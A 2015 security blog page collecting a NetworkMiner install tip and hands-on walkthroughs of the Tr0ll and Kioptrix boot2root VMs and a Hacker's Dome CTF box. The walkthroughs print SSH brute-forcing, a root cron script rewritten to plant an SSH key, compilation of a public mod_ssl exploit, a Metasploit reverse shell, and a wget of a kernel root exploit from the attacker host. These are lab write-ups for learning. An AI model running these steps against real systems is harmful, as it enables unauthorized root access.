Friday, 23 January 2015

How to Visualize Network PCAP Files in Kali Linux

So this past weekend I attended the Security Onion Conference in Augusta, GA.  While sitting in the back listening to some great speakers, @pentestfail and I were hacking away on a side project of his that involved analyzing a decent number of PCAP files.
As usual I was doing my analysis using Wireshark.  But when trying to get a birds eye view of a network I really like to use something like Capsa (which I've only run on Windows) to quickly see the whole picture and let me find interesting bits of traffic.  Then I'll use Wireshark to dig deeper into the things I want to look at.  But I had only brought my laptop which is running Kali Linux.


So welcome NetworkMiner to the rescue.  NetworkMiner is also a Windows program but can be run on Linux using mono pretty easily.  Here's how I got it up in running on my Kali Linux box in about 2 minutes.
apt-get install libmono-winforms2.0-cil
wget sourceforge.net/projects/networkminer/files/latest -O /tmp/networkminer
cd /tmp
unzip ./networkminer -d /opt
cd /opt/NetworkMiner_1-6-1
chmod +x NetworkMiner.exe
chmod -R go+w AssembledFiles/
chmod -R go+w Captures/
mono /opt/NetworkMiner_1-6-1/NetworkMiner.exe
And that's it.  I love it when a plan comes together!


Defeating Tr0ll - Infosec Challenge Walkthrough

This is my walkthrough for defeating Tr0ll infosec challenge.  This is another great "boot2root" VM  that kept my guessing quite a few times.  It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test.  I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book).  So I sit down at my setup and begin.
The Tr0ll VM can be downloaded from
http://vulnhub.com/entry/tr0ll-1,100/

Footprinting:
After loading up the VM I use netdiscover -r to find it's IP address which was 192.168.2.40
Scanning:
Now I start by seeing what Nmap can tell me about this system.
root@moriarty:~/Desktop# nmap -sV -P0 -A 192.168.2.40
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for 192.168.2.40
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=8/19%Time=53F3705E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.46%E=4%D=8/19%OT=21%CT=1%CU=
31767%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=53F3706A%P=x86_64-unknown-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I
OS:%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3
=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN
(W1=7120%W2=7120%W3=7120%W4=7120%W5=71
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=
7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T
=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL
=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.2.40
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

Enumeration:
Since the webserver is enabled I'll continue to gather intel even though I really want to check out the FTP anonymous service that's running.  But patience really is a key to beating a lot of these challenges.
webserver.root@moriarty:~# nikto -h http://192.168.2.40
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.40
+ Target Hostname:    192.168.2.40
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ File/dir '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
I also continue enumerating the webserver with dirb since it's just part of my methodology and you just never know.
root@moriarty:~# dirb http://192.168.2.40
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Aug 19 11:45:38 2014
URL_BASE: http://192.168.2.40/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.2.40/ ----
+ http://192.168.2.40/index.html (CODE:200|SIZE:36)
+ http://192.168.2.40/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.2.40/secret/
+ http://192.168.2.40/server-status (CODE:403|SIZE:292)
---- Entering directory: http://192.168.2.40/secret/ ----
+ http://192.168.2.40/secret/index.html (CODE:200|SIZE:37)
-----------------
DOWNLOADED: 9184 - FOUND: 4
Now my thinking is that I'll check out the FTP service and then look into /secret web directory if FTP doesn't lead anywhere.  But FTP has to come first because who finds anonymous FTP access anymore?  So this is at least interesting, which in my experience is a good indication that it will come into play at some point.  I also looked at SSH but that seems to be pretty normal and trying to exploit this version would prove to be pretty difficult so I'll leave that as a last resort.  So the first attack vector to look into deeper is FTP.  I'll see if anonymous FTP access on this server can provide any clues or further information.  If not then I'll dig deeper into "vsftpd 3.0.2" to see what type of exploits are available for that version.


vsftpd 3.0.2

The anonymous FTP contains only a single file called "lol.pcap" which has really peaked my interest.  I go ahead and look up "vsftpd 3.0.2" exploits but nothing really pops out immediately so I'll put that on the back burner for now and focus on the pcap file.
root@moriarty:~# ftp 192.168.2.40
Connected to 192.168.2.40.
220 (vsFTPd 3.0.2)
Name (192.168.2.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 "/"
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)
My next step is to copy "lol.pcap" over to my machine and load this up in Wireshark and see what kind of traffic it has.  Hopefully there will be some useful information for me to use.


wiresharkftp1

So I see an FTP data session that shows a file transfer.  Luckily FTP uses cleartext so I'll be able to dig deeper into this.  I can see a file that was transferred called "secret_stuff.txt".  I reconstruct the FTP transfer and what do you know?  It gives me a nice little message.

wiresharkftp2

Ok I can see that @maleus21 is messing with me.  I go over the traffic several more times to make sure that I didn't miss anything but it looks like I've found all the useful information.  And of course I continue to feel mocked.

MessWithTheBestDieLikeTheRest

My only clue here is that "sup3rs3cr3tdirlol" is mentioning a directory.  Since FTP doesn't have anything more for me and I have no SSH information to go on my only hope is the webserver.  So I whisper "Help me Apache 2.4.7....Your my only hope."  First I try out the /secret that I discovered earlier.  But this is another dead end belittling my skills.  But I check the source of the page just to make sure but it's definitley a dead end.
With limited services running on this box I'm hoping that "sup3rs3cr3tdirlol" or "sup3rs3cr3t" is a web directory since I'm not really seeing any other options at the moment.  So I try /sup3rs3cr3tdirlol as this is really my only move at this point.  Fingers crossed and BOOM!, I've got something.  This is when the little tingling feeling starts filling up my stomach.

sup3rs3cr3tdirlol

Awesome, that worked and now I've got a file called "roflmao".  Let me check this out.
root@moriarty:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped
Ok so it's a 32-bit ELF file.  Let me see what else I can find out about it.
root@moriarty:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2's complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX - System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27
Everything looks pretty normal in the file and I don't see anything slapping me in the face so it's time to run "roflmao" and find out what it does.


roflmao

root@moriarty:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to proceedroot@moriarty:~/Desktop/Troll#
My immediate thought is that 0x0856BF is a memory address which starts making me sweat.  Like all the great hackers before me whenever I get stuck, I stop and ask myself.  What would Zero Cool do?  Lol, actually I would never think that but it does make for a better story doesn't it?

Zero Cool

My actual thought is this.  What's the simplest solution?  What do I know so far about this system?  What do I know about how Maleus thinks so far?  And my subconscious whispers "directory" which makes sense since it's clear that Maleus likes using obscure directories as we've already seen.
Hacker Pro Tip:   Don't over complicate things.  Remember KISS?  This type of thinking has saved me more times than I can remember.  Plus I'm always looking for shortest distance to an objective since I'm lazy.  So why not try "0x0856BF" as a web directory since it will literally take 4 seconds.
So I go for the long shot and try /0x0856BF.  Awesome, it is and more stuff is revealed.  Two directories.

0856bf

The first is /good_luck and the second
is /this_folder_contains_the_password.  I check out the first folder and find this text file.
/0x0856BF/good_luck/which_one_lol.txt
Which contains the following.
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
So these look like user names so now I check out the second one.  The second folder contains this file.
/0x0856BF/this_folder_contains_the_password/Pass.txt
Which has a nice little message.
Good_job_:)
Since FTP seems to be setup for anonymous access only I'm going to focus on SSH for the time being.  I'm going to use Hydra to automate logging in with these accounts and "Good_job_:)" as the password.
So after several attempts I begin to get banned.

Hydra1

I'm not sure about the timeout since I control the VM.  I keep on rebooting the VM and trying again but it's the same story again and again.  The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.
After trying all the accounts with "Good_job_:)" and getting no luck I stop and take a break to clear my head.  I'm clearly missing something.  After some time away I come back and go through everything again to see what I've missed.  Knowing myself it's probably some small detail that I've overlooked.  I start looking at things a little more closely to see if I could come up with a few more passwords to try.  That's where reading the folder gave me the idea for two more password choices so my password list became this.
Pass
Pass.txt
After trial and error and numerous more reboots I finally get a match for "overflow" and "Pass.txt".  Sweet!


HydraSuccess

Gaining Access:
 Shell - Here I come.


shell

As soon as I start looking around I get this message and I'm booted.
Broadcast Message from root@trol
(somewhere) at 10:00 ...
TIMES UP LOL!
Connection to 192.168.2.40 closed by remote host.
Connection to 192.168.2.40 closed.
Ok so it looks like my session is being timed out.  I log back in and do a quick run through for any files that catch my eye.
$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt  2 root root 4096 Sep  2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx  1 root root   34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you'd think but doesn't provide any other information.
Even though overflow is a low level user I do a "find / -name cleaner.py" anyway to save some time.

lib-log

Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a "ls -al" shows it's owned by root.  This could be good.


cleaner

I use VI to see what's going on.
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Knowing that root owns this file and seeing os.system I know what my next move is going to be.  I'm going to have os.system echo my ssh key into the authorized_keys for root.  I've never actually done this all in a single line but it should work (at least in theory).
So here's what cleaner.py ends up looking like. (I've shorten my key to save space but you get the point.)
#!/usr/bin/env python
import os
import sys
try:
os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN
/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+
xG0sTfjf73CqR0lKO8+rUyUTCJTzWpjWh9zf2
/tHEiXjGAveBwiay1vLsGFEO47QXmyu+lRgFjg==
root@moriarty" >> /root/.ssh/authorized_keys ')
except:
sys.exit()
Now I save the file and wait for it to be kicked off.  What's interesting is that when trying to save my changes in VI it comes up with a permissions error since I'm logged in as "overflow".  But when using "cat" I can see that my changes have been saved.  Sweet luck for me!  After being disconnected it's time to try to login as root.

root ssh

And success!!  I'm logged into Tr0ll as root.  Then I looked to see if there is any type of flag.
root@troll:/lib/log#
root@troll:/lib/log# cd /root/
root@troll:~# ls
proof.txt
root@troll:~# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
And there you have it.  This is a great boot2root and I really enjoyed it.

Xerxes 2: The Second One -- Hacking Challenge Walkthrough

Coming Soon....

Kioptrix Level 1 Hacking Challenge Walkthrough

This is a walkthrough for Kioptrix Level 1.  Although getting root on this box is pretty straightforward it’s a great place for those looking to get their feet wet when it comes to boot2root VM’s.  I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with it’s list of vulnerabilities.
The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/

Footprinting:
After loading up the VM I used netdiscover -r to find it’s IP address which was 192.168.2.90
Scanning:
Now it’s time to use Nmap to grab info about what ports and services are available.

root@moriarty:~# nmap -sV -P0 -A 192.168.2.90
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.2.90
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds
The first thing I noticed is that most of these services are pretty out dated which is good news.  The second thing that grabs my attention is the version of Apache that is being run.  There are clearly several different services running that may provide a foothold into the box but I decided to stick with Apache since it caught my eye.  I fire up Iceweasel and find a default looking Apache page running on the webserver.  Now to run Nikto to see what kind of information it can gather about the webserver.

Enumeration:
root@moriarty:~# nikto -h 192.168.2.90
– Nikto v2.1.6
—————————————————————————
+ Target IP:          192.168.2.90
+ Target Hostname:    192.168.2.90
+ Target Port:        80
+ Start Time:         2014-08-13 11:44:28 (GMT-4)
—————————————————————————
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with ‘Forbidden’ for users, ‘not found’ for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 – Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 – Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 – Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra ‘/’ to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2014-08-13 11:44:53 (GMT-4) (25 seconds)
—————————————————————————
+ 1 host(s) tested

Gaining Access:
Ok so the first thing that Nikto returns is
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
I do a simple Google search to see if there are any obvious exploits that fit my needs.


Well the first result seems to fit the bill quite well.  Now I’m going to use searchsploit to see if I’ve already got this exploit.
root@moriarty:~# searchsploit apache openssl
Description                                                    Path
————————————————————- ———————————-
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c
Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.
Ok so the very first section gives us what we need.
/*
 * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
 *
 * OF version r00t VERY PRIV8 spabam
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
 * #hackarena irc.brasnet.org
 */
If you try to compile this without changing the code you'll end up with a bunch of errors and issues.
 

Luckily the paulsec write up is very straight forward.  So here are the changes I made.
Here are the steps I used to get this to compile in VI.
1) Add these two headers:
#include
#include

2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Install the libssl-dev library if you don't have it already:

apt-get install libssl-dev

4) Update the declaration of variables:
Search for
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
To compile:
gcc -o exploit 764.c -lcrypto  


So the exploit compiled without any issues this time.  Now it’s time to move in for the kill.

root@moriarty:/tmp/exploit# ./exploit | grep -i redhat | grep “1.3.20”


This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.


So I try the 2nd which is 0x6b and decide to add a range of 40 connections for a better shot at getting this to work.


And there it is.  Root access on Kioptrix Level 1.  Feel free to leave feedback and questions in the comments.

Double Kill - Hacker's Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.


First target: 10.200.0.4
Nmap scan:
==========
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH is relatively up to date and so is Apache so time to see what Nikto finds.
Nikto scan:
===========
—————————————————————————
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
—————————————————————————
At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.
More enumeration:
=================
Dirb finds nothing of real interest.
http://10.200.0.4/cgi-bin/


Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)
I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it.  Great!
Exploitation:
=============
https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection


msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name         Current Setting  Required  Description
—-         —————  ——–  ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host
Exploit target:
Id  Name
—  —-
0   Automatic
msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit
[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200
meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
First flag:
===========
www-data@ctf02-01:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c
With this we’re able to get the first user-trophy.txt and move on to getting a root shell.
Local root exploit:
===================
3.2.0-23-generic
x86_64 x86_64 x86_64
http://www.exploit-db.com/exploits/33589/
www-data@ctf02-01:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
–2014-07-26 23:42:11–  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’
100%[======================================>] 3,845       –.-K/s   in 0s
2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]
www-data@ctf02-01:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
www-data@ctf02-01:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@ctf02-01:/tmp/infinity# whoami
whoami
root
root@ctf02-01:/tmp/infinity# cd /root
cd /root
root@ctf02-01:~# ls
ls
superuser-trophy.txt
Second flag:
===========
root@ctf02-01:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01
root@ctf02-01:~#

Creative Structure is Key by Haruki Murakami

There is a quote I read today by Haruki Murakami that really made me sit back and think about how I handle all my daily task and projects.  Especially with my obsession lately for absolute peak performance in my life.

